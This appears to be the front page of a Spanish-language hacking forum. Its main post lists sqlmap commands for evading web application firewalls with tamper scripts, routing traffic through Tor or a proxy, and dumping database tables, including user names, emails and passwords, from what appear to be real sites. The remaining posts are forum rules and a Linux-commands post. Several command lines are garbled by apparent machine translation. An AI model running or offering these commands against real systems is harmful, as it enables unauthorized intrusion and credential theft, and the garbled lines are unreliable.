Welcome, Guest
You have to register before you can post on our site.

Username
  

Password
  





Search Forums

(Advanced Search)

Forum Statistics
» Members: 24,834
» Latest member: GTA5APKves
» Forum threads: 5
» Forum posts: 1

Full Statistics

Online Users
There are currently 52 online users.
» 2 Member(s) | 49 Guest(s)
Google, GTA5APKves, rit

Latest Threads
BYPASS WAF SQLMAP POR UF...
Forum: Informacion & Ayuda
Last Post: UFOOWO
10-Jun-2019, 09:25 PM
» Replies: 0
» Views: 7,426
Comandos basicos de GNU/L...
Forum: Informacion & Ayuda
Last Post: cnyurtz
19-May-2019, 04:56 PM
» Replies: 0
» Views: 4,065
Reglas GNU/Linux
Forum: Reglas Generales
Last Post: cnyurtz
01-May-2019, 09:29 PM
» Replies: 0
» Views: 174,588
Reglas Noticias
Forum: Reglas Generales
Last Post: cnyurtz
01-May-2019, 09:26 PM
» Replies: 0
» Views: 229,576
Reglas generales: Comunid...
Forum: Reglas Generales
Last Post: cnyurtz
01-May-2019, 09:13 PM
» Replies: 0
» Views: 447,087

 
Exclamation BYPASS WAF SQLMAP POR UFO OWO ?
Posted by: UFOOWO - 10-Jun-2019, 09:25 PM - Forum: Informacion & Ayuda - No Replies

Hola chicos en esta oportunidad voy a hacer un pequeño post , para hacer una evasión de WAF , que a veces son un poquito molestos ?, dejare una serie de comandos para hacer una inyección sql y hacer un poquito de magia.
Disfrutenlo.  Angel Angel

Si no has entendido en un comando ponte a estudiar vagos   -Lofiu?

--level = 5 --risk = 3 --random-agent --user-agent -v3 --batch --threads = 10 --dbs



--dbms = "MySQL" -v3 --technique U --tamper = "space2mysqlblank.py" --dbs



--dbms = "MySQL" -v3 --technique U --tamper = "space2comment" --dbs



-v3 --technique = T --no-cast --fresh-queries --banner



sqlmap -u http: //www.********? id = 1 --level 2 --risk 3 --batch --dbs



  Sad Big Grin Cool



 



-f -b - usuario actual --current-db --is-dba --users --dbs



 



--risk = 3 --level = 5 --random-agent --user-agent -v3 --batch --threads = 10 --dbs



 



--risk 3 --level 5 --random-agent --proxy http://123.57.48.140:8080 --dbs



 



--random-agent --dbms = MYSQL --dbs --technique = B "



 



--identificar-waf - agente-aleatorio -v 3 --dbs



 



1: --identify-waf --random-agent -v 3 --tamper = "between, randomcase, space2comment" --dbs



2: --parse-errors -v 3 --current-user --is-dba --banner -D eeaco_gm -T #__tabulizer_user_preferences --column --random-agent --level = 5 --risk = 3



 



--threads = 10 --dbms = MYSQL --tamper = apostrophemask --technique = E -D joomlab -T anz91_session -C session_id --dump



 



--tables -D miss_db --is-dba --threads = "10" --time-sec = 10 --timeout = 5 --no-cast --tamper = entre, modsecurityverde, modsecurityzeroversioned, charencode, mayor - identificar-waf - agente-aleatorio



 



sqlmap.py -u http://192.168.0.107/test.php?id=1 -v 3 --dbms "MySQL" --technique U -p id --batch --tamper "space2morehash.py"



 



--banner --safe-url = 2 --safe-freq = 3 --tamper = between, randomcase, charencode -v 3 --force-ssl --dbs --threads = 10 --level = 2 --risk = 2



-v3 --dbms = "MySQL" --risk = 3 --level = 3 --technique = BU --tamper = "space2mysqlblank.py" --random-agent -D damksa_abr -T admin, jobadmin, member - colu



 







 



--level = 5 --risk = 3 --random-agent --tamper = between, charencode, charunicodeencode, equaltolike, maximum, multiplespaces, no recursivereplacement, porcentaje, randomcase, securesphere, sp_password, space2comment, space2dash, space2mssqlblank, space2mysqashash , space2randomblank, unionalltounion, unmagicquotes --dbms = mssql



 



 



sqlmap.py -url www.site.ps/index.php --level 5 --risk 3 tamper = entre, bluecoat, charencode, charunicodeencode, concat2concatws, equaltolike, más grande, halfversionedmorekeywords, ifnull2ifisnull, modsecurityversioned, modsecurityzeroversioned, multiplespaces, nonrecursivereplacement, porcentaje, randomcase, securesphere, space2comment, space2hash, space2morehash, space2mysqldash, space2plus, space2randomblank, unionalltounion, unmagicquotes, versionedkeywords, versionedmorekeywords, xforwardedfor --dbms = mssql



 



sqlmap.py -url www.site.ps/index.php --level 5 --risk 3 tamper = between, charencode, charunicodeencode, equaltolike, maximum, multiplespaces, nonreursursereplacement, percent, randomcase, seguresphere, sp_password, space2comment, space2dash, space2mssqlblank, space2mysqldash, space2plus, space2randomblank, unionalltounion, unmagicquotes --dbms = mssql



 



 



sqlmap.py -url www.site.ps/index.php --level 5 --risk 3 tamper = apostrophemask, apostrophenullencode, base64encode, entre, chardoubleencode, charencode, charunicodeencecerequeech randomcase, securesphere, space2comment, space2plus, space2randomblank, unionalltounion, unmagicquotes --dbms = mssql



 



 



--level = 5 --risk = 3 -p "id" –-tamper = "apostrophemask, apostrophenullencode, appendnullbyte, base64encode, bluecoat, chardoubleencode, charcodeuccescontentaciones de las personas modsecurityzeroversioned, multiplespaces, nonrecursivereplacement, porcentajes, randomcase, randomcomments, securesphere, space2comment, space2hash, space2morehash, space2aspingsas_aspachas de la vida



 



sqlmap -u 'http://www.site.com:80/search.cmd?form_state=1' –level = 5 –risk = 3 -p 'item1' –tamper = apostrophemask, apostrophenullencode, appendnullbyte, base64encode, entre, bluecoat, chardoubleencode, charencode, charunicodeencode, concat2concatws, equaltolike, más grande, halfversionedmorekeywords, ifnull2ifisnull, modsecurityversioned, modsecurityzeroversioned, multiplespaces, nonrecursivereplacement, porcentaje, randomcase, randomcomments, SecureSphere, space2comment, space2dash, space2hash, space2morehash, space2mssqlblank, space2mssqlhash, space2mysqlblank, space2mysqldash, space2plus, space2randomblank, sp_password, unionalltounion, unmagicquotes, versionedkeywords, versionedmorekeywords



 



  Tongue



--tamper "randomcase.py" --tor --tor-type = SOCKS5 --tor-port = 9050 --dbs --dbms "MySQL" --current-db --random-agent



 



--tamper "randomcase.py" --tor --tor-type = SOCKS5 --tor-port = 9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" - -mesas



 



--tamper "randomcase.py" --tor --tor-type = SOCKS5 --tor-port = 9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" - T "edt_usuarios" --columnas



 



--tamper "randomcase.py" --tor --tor-type = SOCKS5 --tor-port = 9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" - T "edt_usuarios" -C "ud, email, usuario, contra" --dump



 


tamper = between.py, charencode.py, charunicodeencode.py, equaltolike.py, greatest.py, multiplespaces.py, nonrecursivereplacement.py, percent.py, randomcase.py, securesphere.py, sp_password.py, space2comment.py, space2dash.py, space2mssqlblank.py, space2mysqldash.py, space2plus.py, space2randomblank.py, unionalltounion.py, unmagicquotes.py --dbms = mssql

Print this item

  Comandos basicos de GNU/Linux
Posted by: cnyurtz - 19-May-2019, 04:56 PM - Forum: Informacion & Ayuda - No Replies

Como para repasar nunca esta demás

[Image: UgnCz8.png]

Print this item

  Reglas GNU/Linux
Posted by: cnyurtz - 01-May-2019, 09:29 PM - Forum: Reglas Generales - No Replies

[1] Respetar a cada uno de los usuarios del foro, evitar discusiones (fuera del tema) o en su defecto desvío del tema.


[2] Evitar escribir/postear con errores ortográficos.

[3] Escribir/Postear de forma legible y entendible (plantear tu duda/aporte de manera clara, concisa y precisa)

[4] Antes de crear un nuevo tema (aporte), asegúrate de buscar antes si no está, de estar el tema nuevo será eliminado.

[5] Usar el icono correspondiente según sea tu post: Pregunta ([Image: question.gif]) o Aporte ([Image: exclamation.gif])

[6] Evitar revivir temas con +30 días de antigüedad.

[7] Dudas que sean abandonadas por su posteador en un tiempo de 15 días serán eliminadas por abandono (valga la redundancia).

Print this item

  Reglas Noticias
Posted by: cnyurtz - 01-May-2019, 09:26 PM - Forum: Reglas Generales - No Replies

[1] Todas las noticias deben tener un titulo con una explicación breve de que trata el texto.

[2] No importa si la noticia es extendida o breve lo que importa es la información aportada.

[3] No se permiten abreviación de palabras que lleguen a confundir al lector de la noticia.

[4] Toda noticia debe contener una o mas imágenes en relación al tema.

[5] Al final de cada noticia se debe colocar el nombre de la Fuente de donde fue extraída la información posteada.

[6] Cualquier tipo de Post que no cumpla con estos requisitos sera eliminada.

[7] En caso de un error de tipeo, Dichos moderadores se tomaran el trabajo de Editar los errores.

[8] Cada Post debe ser en relación a Tecnologías.

[9] Los Post no deben contener links de ninguna clase

Print this item

  Reglas generales: Comunidad Big Data SSH
Posted by: cnyurtz - 01-May-2019, 09:13 PM - Forum: Reglas Generales - No Replies

[1] Antes de crear un nuevo mensaje por favor utilizar la función Buscar en la parte superior del Foro, posiblemente tu duda ya ha sido resuelta, de esta forma evitarnos la redundancia de posts.

[2] NO está permitido el SPAM (mensajes basura. Aquellos que no aportan nada a la discusión del hilo). Es considerado también spam, iniciativas o proyectos que no estén dentro de Big Data Security Shell. También esta prohibido hablar sobre religión o política.

[3] NO se permite ningún tipo de publicidad de otros sitios, ni imágenes promocionandolo, ni enlaces a cualquier tipo de sitio externo a Big Data Security Shell a menos que sea una descarga directa. También se prohíben los ofrecimientos de trabajo y ventas dentro del foro bajo ninguna circunstancia.

[4] Al iniciar realizar un post, utilizar siempre títulos descriptivos.

[5] NO escribir posts en mayúsculas, o ilegibles, ya sea por el color o cualquier otro motivo.

[6] Esto es un foro, no un móvil. No escribir abreviaturas ni palabras rebuscadas.

[7] No se permite abrir temas repetidos o con el mismo objetivo, tarde o temprano, sea donde sea que tu mensaje se encuentre, será leído.

[8] Bajo ninguna circunstancia se borran cuentas de los usuarios.

[9] Se respetuoso y educado con el resto de usuarios del foro. Pretendemos que el foro sea un punto de reunión para solicitar/prestar ayuda a todos los usuarios de la web. No permitiremos insultos ni faltas de respeto a ningún miembro de la comunidad, de lo contrario esto conllevará a una sanción al usuario agresor.

[10] Está prohibido utilizar el sistema de mensajería privada para enviar mensajes de publicidad/propaganda. Quienes se vean afectado por este tipo de mensajes son incitados a reportar el hecho a algún miembro del Staff.

[11] Problemas de usuarios fuera de la comunidad, no se verán afectadas en el foro.

[12] En caso de un insulto o falto de respeto a cualquier autoridad de la comunidad se tomarán medidas dependiendo de cada caso.

[13] Se prohíbe la introducción de enlaces y sitios webs para beneficio propio del usuario en sistemas que acrediten puntos o dinero por cada entrada.

[14] La carga de archivos con malas intensiones de manera INTENCIONAL es penada (Malware)

[15] Todos los posts deben tener al menos 1 imagen.

[16] Todas las preguntas deben ir a la sección de Dudas Generales para no mezclar con los posts

[17] Todos los post se pueden mover a la zona de análisis si se cree conveniente, una vez se analice se devolverá a su la sección a la que corresponde.

Print this item